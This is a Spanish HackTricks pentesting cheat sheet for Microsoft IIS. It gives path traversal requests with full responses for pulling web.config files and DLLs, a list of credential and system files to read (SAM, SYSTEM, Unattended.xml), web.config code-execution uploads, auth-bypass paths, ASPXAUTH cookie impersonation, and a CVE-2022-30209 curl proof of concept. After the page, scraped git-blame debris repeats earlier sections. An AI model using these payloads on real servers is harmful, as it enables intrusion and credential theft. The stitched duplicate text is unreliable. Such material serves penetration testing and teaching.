hacktricks/network-services-pentesting/pentesting-web/iis-internet-information-services.md

# IIS - Servicios de Información de Internet

<details>

<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Otras formas de apoyar a HackTricks:

* Si quieres ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF**, consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Consigue el [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sigue** a **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Comparte tus trucos de hacking enviando PRs a los repositorios de github** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>

Prueba las extensiones de archivos ejecutables:

* asp
* aspx
* config
* php

## Divulgación de la dirección IP interna

En cualquier servidor IIS donde recibas un 302 puedes intentar eliminar el encabezado Host y usar HTTP/1.0 y dentro de la respuesta el encabezado Location podría indicarte la dirección IP interna:
```
nc -v domain.com 80
openssl s_client -connect domain.com:443
```
Respuesta revelando la IP interna:
```
GET / HTTP/1.0

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Pragma: no-cache
Location: https://192.168.5.237/owa/
Server: Microsoft-IIS/10.0
X-FEServer: NHEXCHANGE2016
```
## Ejecutar archivos .config

Puedes subir archivos .config y usarlos para ejecutar código. Una forma de hacerlo es añadiendo el código al final del archivo dentro de un comentario HTML: [Descargar ejemplo aquí](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config)

Más información y técnicas para explotar esta vulnerabilidad [aquí](https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/)

## Fuerza Bruta en Descubrimiento de IIS

Descarga la lista que he creado:

{% file src="../../.gitbook/assets/iisfinal.txt" %}

Fue creada combinando los contenidos de las siguientes listas:

[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt)\
[http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html](http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html)\
[https://github.com/digination/dirbuster-ng/blob/master/wordlists/vulns/iis.txt](https://github.com/digination/dirbuster-ng/blob/master/wordlists/vulns/iis.txt)\
[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/aspx.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/aspx.txt)\
[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt)\
[https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt](https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt)

Úsala sin añadir ninguna extensión, los archivos que la necesitan ya la incluyen.

## Traversal de Ruta

### Filtración de código fuente

{% hint style="info" %}
En resumen, hay varios archivos web.config dentro de las carpetas de la aplicación con referencias a archivos "**assemblyIdentity**" y "**namespaces**". Con esta información es posible saber **dónde están ubicados los ejecutables** y descargarlos.\
De los **Dlls descargados** también es posible encontrar **nuevos namespaces** donde deberías intentar acceder y obtener el archivo web.config para encontrar nuevos namespaces y assemblyIdentity.\
Además, los archivos **connectionstrings.config** y **global.asax** pueden contener información interesante.\
Referencia: [https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html](https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html)
{% endhint %}

Como cualquier aplicación .Net, las aplicaciones MVC tienen un archivo **web.config**, donde las etiquetas XML "**assemblyIdentity**" identifican cada archivo binario que utiliza la aplicación.
```markup
GET /download_page?id=..%2f..%2fweb.config HTTP/1.1
Host: example-mvc-application.minded
[...]

HTTP/1.1 200 OK
[...]
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<configSections>
<section name="entityFramework" type="System.Data.Entity.Internal.ConfigFile.EntityFrameworkSection, EntityFramework, Version=6.0.0.0, Culture=neutral" requirePermission="false" />
</configSections>
<appSettings>
<add key="webpages:Version" value="3.0.0.0" />
<add key="webpages:Enabled" value="false" />
<add key="ClientValidationEnabled" value="true" />
<add key="UnobtrusiveJavaScriptEnabled" value="true" />
</appSettings>
<system.web>
<authentication mode="None" />
<compilation debug="true" targetFramework="4.6.1" />
<httpRuntime targetFramework="4.6.1" />
</system.web>
<system.webServer>
<modules>
<remove name="FormsAuthentication" />
</modules>
</system.webServer>
<runtime>
<assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
<dependentAssembly>
<assemblyIdentity name="Microsoft.Owin.Security" />
<bindingRedirect oldVersion="1.0.0.0-3.0.1.0" newVersion="3.0.1.0" />
</dependentAssembly>
<dependentAssembly>
<assemblyIdentity name="Microsoft.Owin.Security.OAuth" />
<bindingRedirect oldVersion="1.0.0.0-3.0.1.0" newVersion="3.0.1.0" />
</dependentAssembly>
<dependentAssembly>
<assemblyIdentity name="Microsoft.Owin.Security.Cookies" />
<bindingRedirect oldVersion="1.0.0.0-3.0.1.0" newVersion="3.0.1.0" />
</dependentAssembly>
<dependentAssembly>
<assemblyIdentity name="Microsoft.Owin" />
<bindingRedirect oldVersion="1.0.0.0-3.0.1.0" newVersion="3.0.1.0" />
</dependentAssembly>
<dependentAssembly>
<assemblyIdentity name="Newtonsoft.Json" culture="neutral" />
<bindingRedirect oldVersion="0.0.0.0-6.0.0.0" newVersion="6.0.0.0" />
</dependentAssembly>
<dependentAssembly>
<assemblyIdentity name="System.Web.Optimization" />
<bindingRedirect oldVersion="1.0.0.0-1.1.0.0" newVersion="1.1.0.0" />
</dependentAssembly>
<dependentAssembly>
<assemblyIdentity name="WebGrease" />
<bindingRedirect oldVersion="0.0.0.0-1.5.2.14234" newVersion="1.5.2.14234" />
</dependentAssembly>
<dependentAssembly>
<assemblyIdentity name="System.Web.Helpers" />
<bindingRedirect oldVersion="1.0.0.0-3.0.0.0" newVersion="3.0.0.0" />
</dependentAssembly>
<dependentAssembly>
<assemblyIdentity name="System.Web.Mvc" />
<bindingRedirect oldVersion="1.0.0.0-5.2.3.0" newVersion="5.2.3.0" />
</dependentAssembly>
<dependentAssembly>
<assemblyIdentity name="System.Web.WebPages" />
<bindingRedirect oldVersion="1.0.0.0-3.0.0.0" newVersion="3.0.0.0" />
</dependentAssembly>
</assemblyBinding>
```
En la salida anterior puedes encontrar referencias a varios "**assemblyIdentity**". Estos son archivos que pueden estar ubicados dentro de la carpeta /bin. Por ejemplo: **/bin/WebGrease.dll.**

Otros archivos que podrían encontrarse en el directorio raíz de una aplicación .Net son **/global.asax**
```markup
<%@ Application Codebehind="Global.asax.cs" Inherits="WebApplication1.MvcApplication" Language="C#" %>
```
Y **/connectionstrings.config**

**Nota: ¡este archivo contiene contraseñas!**
```markup
<connectionStrings>
<add name="DefaultConnection" connectionString="Data Source=(LocalDb)\MSSQLLocalDB;AttachDbFilename [...]" providerName="System.Data.SqlClient" />
</connectionStrings>
```
**Namespaces**

Además, las aplicaciones .Net MVC están estructuradas para definir **otros archivos web.config**, con el objetivo de incluir cualquier declaración para espacios de nombres específicos para cada conjunto de viewpages, liberando a los desarrolladores de declarar espacios de nombres "@using" en cada archivo.
```markup
GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1
Host: example-mvc-application.minded
[...]

HTTP/1.1 200 OK
[...]
<?xml version="1.0"?>
<configuration>
<configSections>
<sectionGroup name="system.web.webPages.razor" type="System.Web.WebPages.Razor.Configuration.RazorWebSectionGroup, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral">
<section name="host" type="System.Web.WebPages.Razor.Configuration.HostSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral" requirePermission="false" />
<section name="pages" type="System.Web.WebPages.Razor.Configuration.RazorPagesSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral" requirePermission="false" />
</sectionGroup>
</configSections>
<system.web.webPages.razor><host factoryType="System.Web.Mvc.MvcWebRazorHostFactory, System.Web.Mvc, Version=5.2.3.0, Culture=neutral" /><pages pageBaseType="System.Web.Mvc.WebViewPage">
<namespaces>
<add namespace="System.Web.Mvc" />
<add namespace="System.Web.Mvc.Ajax" />
<add namespace="System.Web.Mvc.Html" />
<add namespace="System.Web.Optimization"/>
<add namespace="System.Web.Routing" />
<add namespace="WebApplication1" />
```
**Descarga de DLLs**

Desde una respuesta anterior, la declaración de un **espacio de nombres personalizado** (ya que otros espacios de nombres son predeterminados) sugiere que una DLL llamada "**WebApplication1**" está presente en el directorio /bin.
```
GET /download_page?id=..%2f..%2fbin/WebApplication1.dll HTTP/1.1
Host: example-mvc-application.minded
[...]
```
Del resultado anterior, dentro del directorio /bin también podrás encontrar las Dlls

* System.Web.Mvc.dll
* System.Web.Mvc.Ajax.dll
* System.Web.Mvc.Html.dll
* System.Web.Optimization.dll
* System.Web.Routing.dll

Supongamos que la DLL anterior está importando un espacio de nombres llamado **WebApplication1.Areas.Minded.** un atacante puede inferir que otros archivos web.config están presentes en la aplicación, en rutas adivinables/por defecto como **/area-name/Views/**, que contienen configuraciones específicas que pueden referirse a otros archivos DLL presentes en la carpeta /bin.
```markup
GET /download_page?id=..%2f..%2fMinded/Views/web.config HTTP/1.1
Host: example-mvc-application.minded
[...]

HTTP/1.1 200 OK
[...]
<?xml version="1.0"?>
<configuration>
<configSections>
<sectionGroup name="system.web.webPages.razor" type="System.Web.WebPages.Razor.Configuration.RazorWebSectionGroup, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral">
<section name="host" type="System.Web.WebPages.Razor.Configuration.HostSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral" requirePermission="false" />
<section name="pages" type="System.Web.WebPages.Razor.Configuration.RazorPagesSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral” requirePermission="false" />
</sectionGroup>
</configSections>
<system.web.webPages.razor><host factoryType="System.Web.Mvc.MvcWebRazorHostFactory, System.Web.Mvc, Version=5.2.3.0, Culture=neutral" />
<pages pageBaseType="System.Web.Mvc.WebViewPage">
<namespaces>
<add namespace="System.Web.Mvc" />
<add namespace="System.Web.Mvc.Ajax" />
<add namespace="System.Web.Mvc.Html" />
<add namespace="System.Web.Routing" />
<add namespace="System.Web.Optimization" />
<add namespace="WebApplication1" />
<add namespace="WebApplication1.AdditionalFeatures" />
</namespaces>
```
Tenga en cuenta cómo en la salida anterior puede ver un nuevo espacio de nombres llamado: **WebApplication1.AdditionalFeatures** lo que indica que hay otro Dll en la carpeta /bin llamado **WebApplication1.AdditionalFeatures.dll**

### Archivos comunes

Desde [aquí](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
```
C:\Apache\conf\httpd.conf
C:\Apache\logs\access.log
C:\Apache\logs\error.log
C:\Apache2\conf\httpd.conf
C:\Apache2\logs\access.log
C:\Apache2\logs\error.log
C:\Apache22\conf\httpd.conf
C:\Apache22\logs\access.log
C:\Apache22\logs\error.log
C:\Apache24\conf\httpd.conf
C:\Apache24\logs\access.log
C:\Apache24\logs\error.log
C:\Documents and Settings\Administrator\NTUser.dat
C:\php\php.ini
C:\php4\php.ini
C:\php5\php.ini
C:\php7\php.ini
C:\Program Files (x86)\Apache Group\Apache\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache\logs\access.log
C:\Program Files (x86)\Apache Group\Apache\logs\error.log
C:\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache2\logs\access.log
C:\Program Files (x86)\Apache Group\Apache2\logs\error.log
c:\Program Files (x86)\php\php.ini"
C:\Program Files\Apache Group\Apache\conf\httpd.conf
C:\Program Files\Apache Group\Apache\conf\logs\access.log
C:\Program Files\Apache Group\Apache\conf\logs\error.log
C:\Program Files\Apache Group\Apache2\conf\httpd.conf
C:\Program Files\Apache Group\Apache2\conf\logs\access.log
C:\Program Files\Apache Group\Apache2\conf\logs\error.log
C:\Program Files\FileZilla Server\FileZilla Server.xml
C:\Program Files\MySQL\my.cnf
C:\Program Files\MySQL\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.cnf
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.1\my.cnf
C:\Program Files\MySQL\MySQL Server 5.1\my.ini
C:\Program Files\MySQL\MySQL Server 5.5\my.cnf
C:\Program Files\MySQL\MySQL Server 5.5\my.ini
C:\Program Files\MySQL\MySQL Server 5.6\my.cnf
C:\Program Files\MySQL\MySQL Server 5.6\my.ini
C:\Program Files\MySQL\MySQL Server 5.7\my.cnf
C:\Program Files\MySQL\MySQL Server 5.7\my.ini
C:\Program Files\php\php.ini
C:\Users\Administrator\NTUser.dat
C:\Windows\debug\NetSetup.LOG
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\Panther\Unattended.xml
C:\Windows\php.ini
C:\Windows\repair\SAM
C:\Windows\repair\system
C:\Windows\System32\config\AppEvent.evt
C:\Windows\System32\config\RegBack\SAM
C:\Windows\System32\config\RegBack\system
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SecEvent.evt
C:\Windows\System32\config\SysEvent.evt
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\winevt\Logs\Application.evtx
C:\Windows\System32\winevt\Logs\Security.evtx
C:\Windows\System32\winevt\Logs\System.evtx
C:\Windows\win.ini
C:\xampp\apache\conf\extra\httpd-xampp.conf
C:\xampp\apache\conf\httpd.conf
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
C:\xampp\FileZillaFTP\FileZilla Server.xml
C:\xampp\MercuryMail\MERCURY.INI
C:\xampp\mysql\bin\my.ini
C:\xampp\php\php.ini
C:\xampp\security\webdav.htpasswd
C:\xampp\sendmail\sendmail.ini
C:\xampp\tomcat\conf\server.xml
```
## Error 404 de HTTPAPI 2.0

Si ves un error como el siguiente:

![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png>)

Significa que el servidor **no recibió el nombre de dominio correcto** dentro del encabezado Host.\
Para acceder a la página web podrías revisar el **Certificado SSL** proporcionado y quizás puedas encontrar el nombre del dominio/subdominio allí. Si no está allí, puede que necesites **fuerza bruta en VHosts** hasta encontrar el correcto.

## Vulnerabilidades antiguas de IIS que vale la pena buscar

### Vulnerabilidad/Característica del carácter tilde “\~” de Microsoft IIS – Divulgación de Nombre de Archivo/Carpeta Corto

Puedes intentar **enumerar carpetas y archivos** dentro de cada carpeta descubierta (incluso si requiere Autenticación Básica) utilizando esta **técnica**.\
La principal limitación de esta técnica si el servidor es vulnerable es que **solo puede encontrar hasta las primeras 6 letras del nombre de cada archivo/carpeta y las primeras 3 letras de la extensión** de los archivos.

Puedes usar [https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner) para probar esta vulnerabilidad:`java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/`

![](<../../.gitbook/assets/image (183).png>)

Investigación original: [https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf](https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf)

También puedes usar **metasploit**: `use scanner/http/iis_shortname_scanner`

### Omisión de Autenticación Básica

**Omitir** una autenticación básica (**IIS 7.5**) intentando acceder a: `/admin:$i30:$INDEX_ALLOCATION/admin.php` o `/admin::$INDEX_ALLOCATION/admin.php`

Puedes intentar **combinar** esta **vulnerabilidad** y la última para encontrar nuevas **carpetas** y **omitir** la autenticación.

## Depuración habilitada de ASP.NET Trace.AXD

ASP.NET incluye un modo de depuración y su archivo se llama `trace.axd`.

Mantiene un registro muy detallado de todas las solicitudes realizadas a una aplicación durante un período de tiempo.

Esta información incluye IP's de clientes remotos, ID de sesiones, todas las cookies de solicitud y respuesta, rutas físicas, información del código fuente y potencialmente incluso nombres de usuario y contraseñas.

[https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/](https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/)

![Screenshot 2021-03-30 at 13 19 11](https://user-images.githubusercontent.com/31736688/112974448-2690b000-915b-11eb-896c-f41c27c44286.png)

## Cookie ASPXAUTH

ASPXAUTH utiliza la siguiente información:

* **`validationKey`** (cadena): clave codificada en hexadecimal para usar en la validación de la firma.
* **`decryptionMethod`** (cadena): (por defecto “AES”).
* **`decryptionIV`** (cadena): vector de inicialización codificado en hexadecimal (por defecto un vector de ceros).
* **`decryptionKey`** (cadena): clave codificada en hexadecimal para usar en el descifrado.

Sin embargo, algunas personas usarán los **valores predeterminados** de estos parámetros y usarán como **cookie el correo electrónico del usuario**. Por lo tanto, si puedes encontrar una web que use la **misma plataforma** que está utilizando la cookie ASPXAUTH y **creas un usuario con el correo electrónico del usuario que quieres suplantar** en el servidor bajo ataque, podrías ser capaz de **usar la cookie del segundo servidor en el primero** y suplantar al usuario.\
Este ataque funcionó en este [**informe**](https://infosecwriteups.com/how-i-hacked-facebook-part-two-ffab96d57b19).

## Omisión de Autenticación en IIS con contraseñas en caché (CVE-2022-30209) <a href="#3-iis-authentication-bypass" id="3-iis-authentication-bypass"></a>

Un error en el código **no verificaba correctamente la contraseña proporcionada por el usuario**, por lo que un atacante cuyo **hash de contraseña coincida con una clave** que ya está en la **caché** podrá iniciar sesión como ese usuario ([informe completo aquí](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html)).
```python
# script for sanity check
> type test.py
def HashString(password):
j = 0
for c in map(ord, password):
j = c + (101*j)&0xffffffff
return j

assert HashString('test-for-CVE-2022-30209-auth-bypass') == HashString('ZeeiJT')

# before the successful login
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
HTTP/1.1 401 Unauthorized

# after the successful login
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
HTTP/1.1 200 OK
```
<details>

<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Otras formas de apoyar a HackTricks:

* Si quieres ver a tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** revisa los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Consigue el [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sigue** a **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Comparte tus trucos de hacking enviando PRs a los repositorios de github de** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>
-												Translated ['network-services-pentesting/pentesting-web/README.md', 'net

											
										
										
											2023-12-31 02:48:25 +00:00
+								# IIS - Servicios de Información de Internet
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
 								<details>
-												Translated ['network-services-pentesting/pentesting-web/README.md', 'net

											
										
										
											2023-12-31 02:48:25 +00:00
+								<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
-												Translated ['network-services-pentesting/pentesting-web/README.md', 'net

											
										
										
											2023-12-31 02:48:25 +00:00
+								Otras formas de apoyar a HackTricks:
 								* Si quieres ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF**, consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
 								* Consigue el [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
 								* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
 								* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sigue** a **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
 								* **Comparte tus trucos de hacking enviando PRs a los repositorios de github** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
 								</details>
-												Translated ['network-services-pentesting/pentesting-web/README.md', 'net

											
										
										
											2023-12-31 02:48:25 +00:00
+								Prueba las extensiones de archivos ejecutables:
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
 								* asp
 								* aspx
 								* config
 								* php
-												Translated ['network-services-pentesting/pentesting-web/iis-internet-inf

											
										
										
											2023-07-11 14:01:07 +00:00
+								## Divulgación de la dirección IP interna
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
-												Translated ['network-services-pentesting/pentesting-web/README.md', 'net

											
										
										
											2023-12-31 02:48:25 +00:00
+								En cualquier servidor IIS donde recibas un 302 puedes intentar eliminar el encabezado Host y usar HTTP/1.0 y dentro de la respuesta el encabezado Location podría indicarte la dirección IP interna:
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
+								```
 								nc -v domain.com 80
 								openssl s_client -connect domain.com:443
 								```
-												Translated ['network-services-pentesting/pentesting-web/iis-internet-inf

											
										
										
											2023-07-11 14:01:07 +00:00
+								Respuesta revelando la IP interna:
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
+								```
-												Translated ['network-services-pentesting/pentesting-web/iis-internet-inf

											
										
										
											2023-07-11 14:01:07 +00:00
+								GET / HTTP/1.0
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
 								HTTP/1.1 302 Moved Temporarily
 								Cache-Control: no-cache
 								Pragma: no-cache
 								Location: https://192.168.5.237/owa/
 								Server: Microsoft-IIS/10.0
 								X-FEServer: NHEXCHANGE2016
 								```
 								## Ejecutar archivos .config
-												Translated ['network-services-pentesting/pentesting-web/README.md', 'net

											
										
										
											2023-12-31 02:48:25 +00:00
+								Puedes subir archivos .config y usarlos para ejecutar código. Una forma de hacerlo es añadiendo el código al final del archivo dentro de un comentario HTML: [Descargar ejemplo aquí](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config)
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
 								Más información y técnicas para explotar esta vulnerabilidad [aquí](https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/)
-												Translated ['network-services-pentesting/pentesting-web/README.md', 'net

											
										
										
											2023-12-31 02:48:25 +00:00
+								## Fuerza Bruta en Descubrimiento de IIS
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
-												Translated ['network-services-pentesting/pentesting-web/iis-internet-inf

											
										
										
											2023-07-11 14:01:07 +00:00
+								Descarga la lista que he creado:
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
 								{% file src="../../.gitbook/assets/iisfinal.txt" %}
-												Translated ['network-services-pentesting/pentesting-web/README.md', 'net

											
										
										
											2023-12-31 02:48:25 +00:00
+								Fue creada combinando los contenidos de las siguientes listas:
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
 								[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt)\
 								[http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html](http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html)\
 								[https://github.com/digination/dirbuster-ng/blob/master/wordlists/vulns/iis.txt](https://github.com/digination/dirbuster-ng/blob/master/wordlists/vulns/iis.txt)\
 								[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/aspx.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/aspx.txt)\
 								[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt)\
 								[https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt](https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt)
-												Translated ['network-services-pentesting/pentesting-web/README.md', 'net

											
										
										
											2023-12-31 02:48:25 +00:00
+								Úsala sin añadir ninguna extensión, los archivos que la necesitan ya la incluyen.
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
-												Translated ['network-services-pentesting/pentesting-web/README.md', 'net

											
										
										
											2023-12-31 02:48:25 +00:00
+								## Traversal de Ruta
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
-												Translated ['network-services-pentesting/pentesting-web/iis-internet-inf

											
										
										
											2023-07-11 14:01:07 +00:00
+								### Filtración de código fuente
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
 								{% hint style="info" %}
-												Translated ['network-services-pentesting/pentesting-web/README.md', 'net

											
										
										
											2023-12-31 02:48:25 +00:00
+								En resumen, hay varios archivos web.config dentro de las carpetas de la aplicación con referencias a archivos "**assemblyIdentity**" y "**namespaces**". Con esta información es posible saber **dónde están ubicados los ejecutables** y descargarlos.\
 								De los **Dlls descargados** también es posible encontrar **nuevos namespaces** donde deberías intentar acceder y obtener el archivo web.config para encontrar nuevos namespaces y assemblyIdentity.\
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
+								Además, los archivos **connectionstrings.config** y **global.asax** pueden contener información interesante.\
 								Referencia: [https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html](https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html)
 								{% endhint %}
 								Como cualquier aplicación .Net, las aplicaciones MVC tienen un archivo **web.config**, donde las etiquetas XML "**assemblyIdentity**" identifican cada archivo binario que utiliza la aplicación.
 								```markup
 								GET /download_page?id=..%2f..%2fweb.config HTTP/1.1
 								Host: example-mvc-application.minded
 								[...]
 								HTTP/1.1 200 OK
 								[...]
 								<?xml version="1.0" encoding="utf-8"?>
 								<configuration>
-												Translated ['network-services-pentesting/pentesting-web/iis-internet-inf

											
										
										
											2023-07-11 14:01:07 +00:00
+								<configSections>
 								<section name="entityFramework" type="System.Data.Entity.Internal.ConfigFile.EntityFrameworkSection, EntityFramework, Version=6.0.0.0, Culture=neutral" requirePermission="false" />
 								</configSections>
 								<appSettings>
 								<add key="webpages:Version" value="3.0.0.0" />
 								<add key="webpages:Enabled" value="false" />
 								<add key="ClientValidationEnabled" value="true" />
 								<add key="UnobtrusiveJavaScriptEnabled" value="true" />
 								</appSettings>
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
+								<system.web>
-												Translated ['network-services-pentesting/pentesting-web/iis-internet-inf

											
										
										
											2023-07-11 14:01:07 +00:00
+								<authentication mode="None" />
 								<compilation debug="true" targetFramework="4.6.1" />
 								<httpRuntime targetFramework="4.6.1" />
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
+								</system.web>
 								<system.webServer>
-												Translated ['network-services-pentesting/pentesting-web/iis-internet-inf

											
										
										
											2023-07-11 14:01:07 +00:00
+								<modules>
 								<remove name="FormsAuthentication" />
 								</modules>
-												f

											
										
										
											2023-06-05 18:33:24 +00:00
+								</system.webServer>
 								<runtime>
-												Translated ['network-services-pentesting/pentesting-web/iis-internet-inf

											
										
										
											2023-07-11 14:01:07 +00:00
+								<assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
 								<dependentAssembly>
 								<assemblyIdentity name="Microsoft.Owin.Security" />
 								<bindingRedirect oldVersion="1.0.0.0-3.0.1.0" newVersion="3.0.1.0" />
 								</dependentAssembly>
 								<dependentAssembly>
 								<assemblyIdentity name="Microsoft.Owin.Security.OAuth" />
 								<bindingRedirect oldVersion="1.0.0.0-3.0.1.0" newVersion="3.0.1.0" />
 								</dependentAssembly>
 								<dependentAssembly>
 								<assemblyIdentity name="Microsoft.Owin.Security.Cookies" />
 								<bindingRedirect oldVersion="1.0.0.0-3.0.1.0" newVersion="3.0.1.0" />
 								</dependentAssembly>
 								<dependentAssembly>
 								<assemblyIdentity name="Microsoft.Owin" />
 								<bindingRedirect oldVersion="1.0.0.0-3.0.1.0" newVersion="3.0.1.0" />
